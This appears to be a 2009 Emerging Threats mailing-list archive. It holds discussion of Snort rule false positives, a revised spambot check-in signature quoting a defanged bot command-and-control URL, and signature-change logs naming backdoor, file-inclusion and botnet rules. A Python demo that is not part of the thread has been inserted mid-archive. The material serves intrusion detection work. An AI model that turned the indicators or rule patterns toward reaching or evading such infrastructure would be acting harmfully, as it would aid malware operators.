User agent string that generated the FP: User-Agent: Things/591 (Mac OS X) CCSparkle/1.0\r\n alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Better Internet Spyware User Agent Activity (thin)"; flow: to_server,established; content:"User-Agent\: thin"; nocase; classtype: trojan-activity; reference:url,doc.emergingthreats.net/bin/view/Main/2002035; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_USER_Agents; sid: 2002035; rev:21;) Thanks, Shannon From jonkman at jonkmans.com Fri May 8 09:11:09 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Fri, 08 May 2009 09:11:09 -0400 Subject: [Emerging-Sigs] FPs on 2002035 In-Reply-To: <4A0372BE.7000509@ligo-la.caltech.edu> References: <4A0372BE.7000509@ligo-la.caltech.edu> Message-ID: <4A042F6D.2060608@jonkmans.com> Hmmm, thanks for the FP report. I can drop the nocase on this one. The original malware used "thininstall" and a few other variations. But I can't recall the alst time we had a real hit on this. I suspect this malware has gone away or morphed into something new. Does anyone recall the last hit they had on this? I have 0 hits in the sidreporter database, so none have been reported for at least 6 months. I'm leaning toward dropping this rule. If it resurfaces we'll see it in the sandnet and can bring the rules back. Any objections? Thanks Shannon Matt Shannon Roddy wrote: > FP on the following rule will happen if you have a user of > culturecode.com's "Things" for mac or iphone. 
> > User agent string that generated the FP: > > User-Agent: Things/591 (Mac OS X) CCSparkle/1.0\r\n > > > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE > Better Internet Spyware User Agent Activity (thin)"; flow: > to_server,established; content:"User-Agent\: thin"; nocase; classtype: > trojan-activity; > reference:url,doc.emergingthreats.net/bin/view/Main/2002035; > reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_USER_Agents; > sid: 2002035; rev:21;) > > > > Thanks, > Shannon > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From pepperjack at afferentsecurity.com Fri May 8 10:13:20 2009 From: pepperjack at afferentsecurity.com (Jack Pepper) Date: Fri, 08 May 2009 09:13:20 -0500 Subject: [Emerging-Sigs] FPs on 2002035 In-Reply-To: <4A042F6D.2060608@jonkmans.com> References: <4A0372BE.7000509@ligo-la.caltech.edu> <4A042F6D.2060608@jonkmans.com> Message-ID: <20090508091320.jr6zm3lo0skw48kw@mail.afferentsecurity.com> Quoting Matt Jonkman : > Does anyone recall the last hit they had on this? I have 0 hits in the > sidreporter database, so none have been reported for at least 6 months. Checking my DB for 6 mos, I never got a hit on this one. (appx 9000 ip devices) > Any objections? none from me. jp -- Framework? I don't need no stinking framework! 
---------------------------------------------------------------- @fferent Security Labs: Isolate/Insulate/Innovate http://www.afferentsecurity.com From emerging at emergingthreats.net Fri May 8 16:00:11 2009 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Fri, 8 May 2009 16:00:11 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20090508200011.079B34504B@goliath.jonkmans.com> [***] Results from Oinkmaster started Fri May 8 16:00:10 2009 [***] [///] Modified active rules: [///] 2002035 - ET MALWARE Better Internet Spyware User Agent Activity (thin) (emerging-malware.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (2): 2500141 || ET COMPROMISED Known Compromised or Hostile Host Traffic (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510141 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Added to emerging-sid-msg.map.txt (2): 2500141 || ET COMPROMISED Known Compromised or Hostile Host Traffic (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510141 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From phatbuckett at gmail.com Fri May 8 16:22:40 2009 From: phatbuckett at gmail.com (Darren Spruell) Date: Fri, 8 May 2009 13:22:40 -0700 Subject: [Emerging-Sigs] Spambot detection on 2008189, mod Message-ID: <839aec700905081322jecb8b06sc54cacdc89ba4252@mail.gmail.com> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN SpamTool.Win32.Agent.gy Or Similar HTTP Checkin"; flow:established,to_server; uricontent:"alive.php?id="; nocase; uricontent:"&tick="; nocase; uricontent:"&ver="; nocase; uricontent:"&smtp="; nocase; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2008189; 
reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools; sid:2008189; rev:2;)

Caught a report mentioning request as follows:

hxxp://91.207.4.138/spm/page.php?id=&tick=108484&ver=100&smtp=ok&task=0

...so relying on the script name breaks this. Alteration?:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN SpamTool.Win32.Agent.gy Or Similar HTTP Checkin"; flow:established,to_server; uricontent:"?id="; nocase; uricontent:"&tick="; nocase; uricontent:"&ver="; nocase; uricontent:"&smtp="; nocase; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2008189; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools; sid:2008189; rev:3;)

Above is probably still specific enough without worrying about the maybe recently added 'tick' parameter...

-- 
Darren Spruell
phatbuckett at gmail.com

From phatbuckett at gmail.com Fri May 8 18:49:18 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Fri, 8 May 2009 15:49:18 -0700
Subject: [Emerging-Sigs] Spambot detection on 2008189, mod
In-Reply-To: <839aec700905081322jecb8b06sc54cacdc89ba4252@mail.gmail.com>
References: <839aec700905081322jecb8b06sc54cacdc89ba4252@mail.gmail.com>
Message-ID: <839aec700905081549ob3d4b23h7e34742bec1dd502@mail.gmail.com>

On Fri, May 8, 2009 at 1:22 PM, Darren Spruell wrote:
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
> SpamTool.Win32.Agent.gy Or Similar HTTP Checkin";
> flow:established,to_server; uricontent:"alive.php?id="; nocase;
> uricontent:"&tick="; nocase; uricontent:"&ver="; nocase;
> uricontent:"&smtp="; nocase; classtype:trojan-activity;
> reference:url,doc.emergingthreats.net/2008189;
> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools;
> sid:2008189; rev:2;)
>
> Caught a report mentioning request as follows:
>
> hxxp://91.207.4.138/spm/page.php?id=&tick=108484&ver=100&smtp=ok&task=0
>
>
> ...so relying on the script name breaks this. Alteration?:
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
> SpamTool.Win32.Agent.gy Or Similar HTTP Checkin";
> flow:established,to_server; uricontent:"?id="; nocase;
> uricontent:"&tick="; nocase; uricontent:"&ver="; nocase;
> uricontent:"&smtp="; nocase; classtype:trojan-activity;
> reference:url,doc.emergingthreats.net/2008189;
> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools;
> sid:2008189; rev:3;)
>
> Above is probably still specific enough without worrying about the
> maybe recently added 'tick' parameter...

Might also be worth noting the common name in the message, "Grum" (also Tedroo).

http://securitylabs.websense.com/content/Blogs/2721.aspx
http://www.secureworks.com/research/threats/botnets2009/

-- 
Darren Spruell
phatbuckett at gmail.com

From emerging at emergingthreats.net Sat May 9 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat, 9 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090509200010.A0AA14504B@goliath.jonkmans.com>

[***] Results from Oinkmaster started Sat May 9 16:00:10 2009 [***]

[*] Rules modifications: [*]
    None.
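To make the rev:2 to rev:3 trade-off in the 2008189 thread above concrete, here is an added Python example (not code from the thread, from Darren, or from the Emerging Threats ruleset) that emulates the ANDed uricontent ... nocase checks of both rule revisions over a handful of constructed request lines, including the page.php URI form quoted in the report. It assumes that, for this rule, Snort's uricontent matching reduces to case-insensitive substring tests on the request URI, which holds because none of the matches are constrained with distance/within or offset/depth; the request lines and the extra /status/ping.php URI are made up for the demo.

```python
"""Emulate ET sid 2008189 rev 2 vs rev 3 uricontent matching (added example).

Snort ANDs every uricontent option in a rule; with nocase each one is a
case-insensitive substring match on the normalized request URI.  Without
distance/within or offset/depth the patterns may appear in any order, so
the whole rule reduces to "all patterns are present somewhere in the URI".
"""
from typing import Dict, List

# Constructed request lines for the demo (not captured traffic).  The two
# /spm/ paths reproduce the URI forms discussed in the thread; the rest are
# made up to probe the edges of the rule.
SAMPLE_REQUESTS = [
    "GET /spm/alive.php?id=&tick=108484&ver=100&smtp=ok HTTP/1.1",        # form rev:2 was written for
    "GET /spm/page.php?id=&tick=108484&ver=100&smtp=ok&task=0 HTTP/1.1",  # renamed script from the report
    "GET /spm/ALIVE.PHP?ID=&TICK=1&VER=100&SMTP=ok HTTP/1.1",             # case variant; nocase must still hit
    "GET /shop/item.php?id=42&ver=2 HTTP/1.1",                             # benign: no &tick= and no &smtp=
    "GET /status/ping.php?id=7&tick=1&ver=3&smtp=ok HTTP/1.1",             # any script with all four params fires rev:3
]

# uricontent patterns per revision, taken from the two rule texts in the thread
RULE_REVISIONS: Dict[int, List[str]] = {
    2: ["alive.php?id=", "&tick=", "&ver=", "&smtp="],
    3: ["?id=", "&tick=", "&ver=", "&smtp="],
}


def request_uri(request_line: str) -> str:
    """Pull the request-URI out of an HTTP request line ("METHOD URI VERSION")."""
    parts = request_line.split()
    if len(parts) < 2:
        raise ValueError(f"not an HTTP request line: {request_line!r}")
    return parts[1]


def uricontent_match(uri: str, patterns: List[str]) -> bool:
    """True when every pattern occurs in the URI, case-insensitively (uricontent + nocase, ANDed)."""
    haystack = uri.lower()
    return all(p.lower() in haystack for p in patterns)


def evaluate(requests: List[str] = SAMPLE_REQUESTS,
             revisions: Dict[int, List[str]] = RULE_REVISIONS) -> Dict[int, List[str]]:
    """Return, per rule revision, the URIs from `requests` that would fire it."""
    hits: Dict[int, List[str]] = {}
    for rev, patterns in revisions.items():
        hits[rev] = [request_uri(r) for r in requests
                     if uricontent_match(request_uri(r), patterns)]
    return hits


if __name__ == "__main__":
    for rev, uris in sorted(evaluate().items()):
        print(f"rev:{rev} fires on {len(uris)} of {len(SAMPLE_REQUESTS)} requests")
        for u in uris:
            print(f"    {u}")
```

Running it shows rev:2 missing the page.php check-in while rev:3 catches it, and that rev:3 fires on any script path carrying the four parameter names; before shipping the looser revision, the same function run over a sample of your own proxy logs is a cheap way to measure that false-positive exposure.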
[---] Removed non-rule lines: [---]

    -> Removed from emerging-sid-msg.map (6):
       2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
       2500140 || ET COMPROMISED Known Compromised or Hostile Host Traffic (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
       2500141 || ET COMPROMISED Known Compromised or Hostile Host Traffic (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
       2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
       2510140 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
       2510141 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

    -> Removed from emerging-sid-msg.map.txt (6):
       2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
       2500140 || ET COMPROMISED Known Compromised or Hostile Host Traffic (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
       2500141 || ET COMPROMISED Known Compromised or Hostile Host Traffic (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
       2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
       2510140 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
       2510141 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From emerging at emergingthreats.net Sat May 9 18:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat, 9 May 2009 18:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Weekly Signature Changes
Message-ID: <20090509220010.BBDB74504B@goliath.jonkmans.com>

[***] Results from Oinkmaster started Sat May 9 18:00:10 2009 [***]

[+++] Added rules: [+++]

    2009300 - ET TROJAN Small.zon checkin (emerging-virus.rules)
    2009301 - ET POLICY Megaupload file download service access (emerging-policy.rules)
    2009302 - ET POLICY Badongo file download service access (emerging-policy.rules)
    2009303 - ET POLICY MediaFire file download service access (emerging-policy.rules)
    2009304 - ET POLICY Gigasize file download service access (emerging-policy.rules)
    2009305 - ET TROJAN Zlob post installation checkin (.php?inst_result=&hwid) (emerging-virus.rules)
    2009306 - ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
    2009307 - ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
    2009308 - ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
    2009309 - ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
    2009310 - ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
    2009311 - ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
    2009312 - ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
    2009313 - ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
    2009314 - ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete (emerging-web.rules)
    2009315 - ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite (emerging-web.rules)
    2009316 - ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
    2009317 - ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
    2009318 - ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
    2009319 - ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection (emerging-web_sql_injection.rules)
    2009320 - ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion (emerging-web_sql_injection.rules)
    2009321 - ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion (emerging-web_sql_injection.rules)
    2009322 - ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution (emerging-web.rules)
    2009323 - ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection (emerging-web_sql_injection.rules)
    2009324 - ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion (emerging-web_sql_injection.rules)
    2009325 - ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
    2009326 - ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
    2009327 - ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
    2009328 - ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution (emerging-web.rules)
    2009329 - ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion (emerging-web_sql_injection.rules)
    2009330 - ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion (emerging-web_sql_injection.rules)
    2009331 - ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion (emerging-web_sql_injection.rules)
    2009332 - ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion (emerging-web_sql_injection.rules)
    2009333 - ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion (emerging-web_sql_injection.rules)
    2009334 - ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite (emerging-web.rules)
    2009335 - ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection (emerging-web_sql_injection.rules)
    2009336 - ET WEB Possible Web Backdoor cfexec.cfm access (emerging-web.rules)
    2009337 - ET WEB Possible Web Backdoor cmdasp.asp access (emerging-web.rules)
    2009338 - ET WEB Possible Web Backdoor cmdasp.aspx access (emerging-web.rules)
    2009339 - ET WEB Possible Web Backdoor simple-backdoor.php access (emerging-web.rules)
    2009340 - ET WEB Possible Web Backdoor php-backdoor.php access (emerging-web.rules)
    2009341 - ET WEB Possible Web Backdoor jsp-reverse.jsp access (emerging-web.rules)
    2009342 - ET WEB Possible Web Backdoor perlcmd.cgi access (emerging-web.rules)
    2009343 - ET WEB Possible Web Backdoor cmdjsp.jsp access (emerging-web.rules)
    2009344 - ET WEB Possible Web Backdoor cmd-asp-5.1.asp access (emerging-web.rules)

[///] Modified active rules: [///]

    2002035 - ET MALWARE Better Internet Spyware User Agent Activity (thin) (emerging-malware.rules)
    2002750 - ET POLICY Reserved IP Space Traffic - Bogon Nets 2 (emerging-policy.rules)
    2009288 - ET WEB PHP Attack Tool Revolt Scanner (emerging-web.rules)
    2009296 - ET TROJAN Banker/Banbra Related HTTP Post-infection Checkin (emerging-virus.rules)
    2009297 - ET TROJAN Boaxxe HTTP POST Checkin (emerging-virus.rules)
    2009298 - ET SCAN Port Unreachable Response to Xprobe2 OS Fingerprint Scan (emerging-scan.rules)
    2009299 - ET TROJAN General Trojan Downloader (emerging-virus.rules)
    2400000 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
    2400001 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
    2400002 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
    2400003 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
    2400004 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
    2400005 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
    2400006 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
    2400007 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
    2400008 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
    2401000 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
    2401001 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
    2401002 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
    2401003 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
    2401004 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
    2401005 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
    2401006 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
    2401007 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
    2401008 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
    2402000 - ET DROP Dshield Block Listed Source (emerging-dshield.rules)
    2403000 - ET DROP Dshield Block Listed Source - BLOCKING (emerging-dshield-BLOCK.rules)
    2404000 - ET DROP Known Bot C&C Server Traffic (group 1) (emerging-botcc.rules)
    2404001 - ET DROP Known Bot C&C Server Traffic (group 2) (emerging-botcc.rules)
    2404002 - ET DROP Known Bot C&C Server Traffic (group 3) (emerging-botcc.rules)
    2404003 - ET DROP Known Bot C&C Server Traffic (group 4) (emerging-botcc.rules)
    2404004 - ET DROP Known Bot C&C Server Traffic (group 5) (emerging-botcc.rules)
    2404005 - ET DROP Known Bot C&C Server Traffic (group 6) (emerging-botcc.rules)
    2404006 - ET DROP Known Bot C&C Server Traffic (group 7) (emerging-botcc.rules)
    2404007 - ET DROP Known Bot C&C Server Traffic (group 8) (emerging-botcc.rules)
    2404008 - ET DROP Known Bot C&C Server Traffic (group 9) (emerging-botcc.rules)
    2404009 - ET DROP Known Bot C&C Server Traffic (group 10) (emerging-botcc.rules)
    2404010 - ET DROP Known Bot C&C Server Traffic (group 11) (emerging-botcc.rules)
    2404011 - ET DROP Known Bot C&C Server Traffic (group 12) (emerging-botcc.rules)
    2404012 - ET DROP Known Bot C&C Server Traffic (group 13) (emerging-botcc.rules)
    2404013 - ET DROP Known Bot C&C Server Traffic (group 14) (emerging-botcc.rules)
    2404014 - ET DROP Known Bot C&C Server Traffic (group 15) (emerging-botcc.rules)
    2404015 - ET DROP Known Bot C&C Server Traffic (group 16) (emerging-botcc.rules)
    2404016 - ET DROP Known Bot C&C Server Traffic (group 17) (emerging-botcc.rules)
    2404017 - ET DROP Known Bot C&C Server Traffic (group 18) (emerging-botcc.rules)
    2404018 - ET DROP Known Bot C&C Server Traffic (group 19) (emerging-botcc.rules)
    2404019 - ET DROP Known Bot C&C Server Traffic (group 20) (emerging-botcc.rules)
    2404020 - ET DROP Known Bot C&C Server Traffic (group 21) (emerging-botcc.rules)
    2404021 - ET DROP Known Bot C&C Server Traffic (group 22) (emerging-botcc.rules)
    2404022 - ET DROP Known Bot C&C Server Traffic (group 23) (emerging-botcc.rules)
    2404023 - ET DROP Known Bot C&C Server Traffic (group 24) (emerging-botcc.rules)
    2405000 - ET DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405001 - ET DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405002 - ET DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405003 - ET DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405004 - ET DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405005 - ET DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405006 - ET DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405007 - ET DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405008 - ET DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405009 - ET DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405010 - ET DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405011 - ET DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405012 - ET DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405013 - ET DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405014 - ET DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405015 - ET DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405016 - ET DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405017 - ET DROP Known Bot C&C Traffic (group 18) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405018 - ET DROP Known Bot C&C Traffic (group 19) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405019 - ET DROP Known Bot C&C Traffic (group 20) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405020 - ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405021 - ET DROP Known Bot C&C Traffic (group 22) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405022 - ET DROP Known Bot C&C Traffic (group 23) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405023 - ET DROP Known Bot C&C Traffic (group 24) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2406000 - ET RBN Known Russian Business Network Monitored Domains (1) (emerging-rbn.rules)
    2406001 - ET RBN Known Russian Business Network Monitored Domains (2) (emerging-rbn.rules)
    2406002 - ET RBN Known Russian Business Network Monitored Domains (3) (emerging-rbn.rules)
    2406003 - ET RBN Known Russian Business Network Monitored Domains (4) (emerging-rbn.rules)
    2406004 - ET RBN Known Russian Business Network Monitored Domains (5) (emerging-rbn.rules)
    2406005 - ET RBN Known Russian Business Network Monitored Domains (6) (emerging-rbn.rules)
    2406006 - ET RBN Known Russian Business Network Monitored Domains (7) (emerging-rbn.rules)
    2406007 - ET RBN Known Russian Business Network Monitored Domains (8) (emerging-rbn.rules)
    2406008 - ET RBN Known Russian Business Network Monitored Domains (9) (emerging-rbn.rules)
    2406009 - ET RBN Known Russian Business Network Monitored Domains (10) (emerging-rbn.rules)
    2406010 - ET RBN Known Russian Business Network Monitored Domains (11) (emerging-rbn.rules)
    2406011 - ET RBN Known Russian Business Network Monitored Domains (12) (emerging-rbn.rules)
    2406012 - ET RBN Known Russian Business Network Monitored Domains (13) (emerging-rbn.rules)
    2406013 - ET RBN Known Russian Business Network Monitored Domains (14) (emerging-rbn.rules)
    2406014 - ET RBN Known Russian Business Network Monitored Domains (15) (emerging-rbn.rules)
    2406015 - ET RBN Known Russian Business Network Monitored Domains (16) (emerging-rbn.rules)
    2406016 - ET RBN Known Russian Business Network Monitored Domains (17) (emerging-rbn.rules)
    2406017 - ET RBN Known Russian Business Network Monitored Domains (18) (emerging-rbn.rules)
    2406018 - ET RBN Known Russian Business Network Monitored Domains (19) (emerging-rbn.rules)
    2406019 - ET RBN Known Russian Business Network Monitored Domains (20) (emerging-rbn.rules)
    2406020 - ET RBN Known Russian Business Network Monitored Domains (21) (emerging-rbn.rules)
    2406021 - ET RBN Known Russian Business Network Monitored Domains (22) (emerging-rbn.rules)
    2406022 - ET RBN Known Russian Business Network Monitored Domains (23) (emerging-rbn.rules)
    2406023 - ET RBN Known Russian Business Network Monitored Domains (24) (emerging-rbn.rules)
    2406024 - ET RBN Known Russian Business Network Monitored Domains (25) (emerging-rbn.rules)
    2406025 - ET RBN Known Russian Business Network Monitored Domains (26) (emerging-rbn.rules)
    2406026 - ET RBN Known Russian Business Network Monitored Domains (27) (emerging-rbn.rules)
    2406027 - ET RBN Known Russian Business Network Monitored Domains (28) (emerging-rbn.rules)
    2406028 - ET RBN Known Russian Business Network Monitored Domains (29) (emerging-rbn.rules)
    2406029 - ET RBN Known Russian Business Network Monitored Domains (30) (emerging-rbn.rules)
    2406030 - ET RBN Known Russian Business Network Monitored Domains (31) (emerging-rbn.rules)
    2406031 - ET RBN Known Russian Business Network Monitored Domains (32) (emerging-rbn.rules)
    2406032 - ET RBN Known Russian Business Network Monitored Domains (33) (emerging-rbn.rules)
    2406033 - ET RBN Known Russian Business Network Monitored Domains (34) (emerging-rbn.rules)
    2406034 - ET RBN Known Russian Business Network Monitored Domains (35) (emerging-rbn.rules)
    2406035 - ET RBN Known Russian Business Network Monitored Domains (36) (emerging-rbn.rules)
    2406036 - ET RBN Known Russian Business Network Monitored Domains (37) (emerging-rbn.rules)
    2406037 - ET RBN Known Russian Business Network Monitored Domains (38) (emerging-rbn.rules)
    2406038 - ET RBN Known Russian Business Network Monitored Domains (39) (emerging-rbn.rules)
    2406039 - ET RBN Known Russian Business Network Monitored Domains (40) (emerging-rbn.rules)
    2406040 - ET RBN Known Russian Business Network Monitored Domains (41) (emerging-rbn.rules)
    2406041 - ET RBN Known Russian Business Network Monitored Domains (42) (emerging-rbn.rules)
    2406042 - ET RBN Known Russian Business Network Monitored Domains (43) (emerging-rbn.rules)
    2406043 - ET RBN Known Russian Business Network Monitored Domains (44) (emerging-rbn.rules)
    2406044 - ET RBN Known Russian Business Network Monitored Domains (45) (emerging-rbn.rules)
    2406045 - ET RBN Known Russian Business Network Monitored Domains (46) (emerging-rbn.rules)
    2406046 - ET RBN Known Russian Business Network Monitored Domains (47) (emerging-rbn.rules)
